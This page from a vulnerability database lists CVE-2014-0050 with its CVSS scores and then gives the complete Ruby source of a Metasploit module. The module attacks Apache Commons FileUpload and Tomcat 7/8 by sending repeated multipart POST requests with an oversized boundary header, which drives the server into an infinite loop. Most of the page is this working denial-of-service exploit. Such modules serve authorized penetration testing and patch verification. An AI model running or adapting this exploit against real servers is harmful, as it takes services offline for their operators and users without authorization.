Apache Commons FileUpload and Apache Tomcat Denial of Service

2024-08-3100:00:00

temp66, ribeirux, metasploit.com

packetstormsecurity.com

metasploit module

denial of service

cve 2014-0050

apache tomcat 6

apache tomcat 7

apache tomcat 8

apache commons fileupload

security vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.2

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',  
'Description' => %q{  
This module triggers an infinite loop in Apache Commons FileUpload 1.0  
through 1.3 via a specially crafted Content-Type header.  
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle  
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50  
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also  
uses Commons FileUpload as part of the Manager application.  
},  
'Author' =>  
[  
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.  
'ribeirux' # metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2014-0050'],  
['URL', 'https://tomcat.apache.org/security-8.html'],  
['URL', 'https://tomcat.apache.org/security-7.html']  
],  
'DisclosureDate' => '2014-02-06'  
))  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [ true, "The request URI", '/']),  
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])  
])  
end  
  
def run  
boundary = "0"*4092  
opts = {  
'method' => "POST",  
'uri' => normalize_uri(target_uri.to_s),  
'ctype' => "multipart/form-data; boundary=#{boundary}",  
'data' => "#{boundary}00000",  
'headers' => {  
'Accept' => '*/*'  
}  
}  
  
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby  
# This should be rewritten with 1.upto() or Enumerable#each or  
# something  
for x in 1..datastore['RLIMIT']  
print_status("Sending request #{x} to #{peer}")  
begin  
c = connect  
r = c.request_cgi(opts)  
c.send_request(r)  
# Don't wait for a response  
rescue ::Rex::ConnectionError => exception  
print_error("Unable to connect: '#{exception.message}'")  
return  
ensure  
disconnect(c) if c  
end  
end  
end  
end  
  
`